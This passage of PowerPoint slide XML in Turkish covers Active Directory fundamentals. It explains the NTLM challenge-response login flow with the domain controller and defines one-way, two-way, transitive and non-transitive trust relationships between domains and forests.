              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>adını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>açık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şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gönderir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Sunucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>istemciye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>doğrulaması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yapabilmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>adına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>adlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>rastgele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>üretilmiş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değer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gönderir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>İstemci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanıcının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>NTHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değeri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hashlenir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucuya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>geri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gönderir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Sunucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>istemciden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>aldığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>şifrelenmiş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>veriyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucusuna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gönderir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Eğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>lokal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oturum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>açma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>işlemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gerçekleşiyorsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucusuna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>istek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gönderilmez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Son </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>adımda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucusundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>mesajı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>doğrulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>mesajı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gönderilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A diagram of a server&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{560D1665-0C81-3E28-17BF-2B7E39389A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388522"/>
            <a:ext cx="5181600" cy="32255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40618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EF1AB-2E12-FB1D-6D5E-7274F655B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1F1C6-52A8-C435-1904-089F4761B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Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Temelleri</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Content Placeholder 18" descr="A blue diamond with white dots and a black background&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D77A643-55F5-B02C-16F0-48C750F6BD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8667281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A37C8-77AF-F33B-D445-0D7E04F06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Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Yapıları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22C69-94A4-54DE-B13A-A7A4C67EEC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r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Farklı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Forest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yapılarının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>birbiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iletişim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kurabilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>oluşturulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ilişkilerdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Genellikle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>büyük</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>dağıtık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>altyapıya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sahip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>organizasyonlarda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>firma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>birleşmelerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ihtiyaç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>duyulmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yapılarında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yönü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>erişim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yönü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>birbirine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>terstir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Çeşitli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yöntemleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ilişki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>türleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bulunmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>One-Way: A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objesinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objesine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>trustın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bulunup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objesinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objesine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tanımlanmadığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>durumdur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Two-Way: A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>arasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>karşılıklıa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ilişkisinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bulunduğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>durumdur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Transitive: Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ilişkisinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>geçiskenliğini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ifade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>etmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>arasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>arasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>varsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>arasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>otomatikman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bulunmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Non-Transitive: Transitive trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>aksine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>güven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ilişkisinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>geçişken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>olmadığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>durumdur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33974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67F22-D4D6-CA8A-BFDE-23095B377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Trust </a:t>
            </a:r>
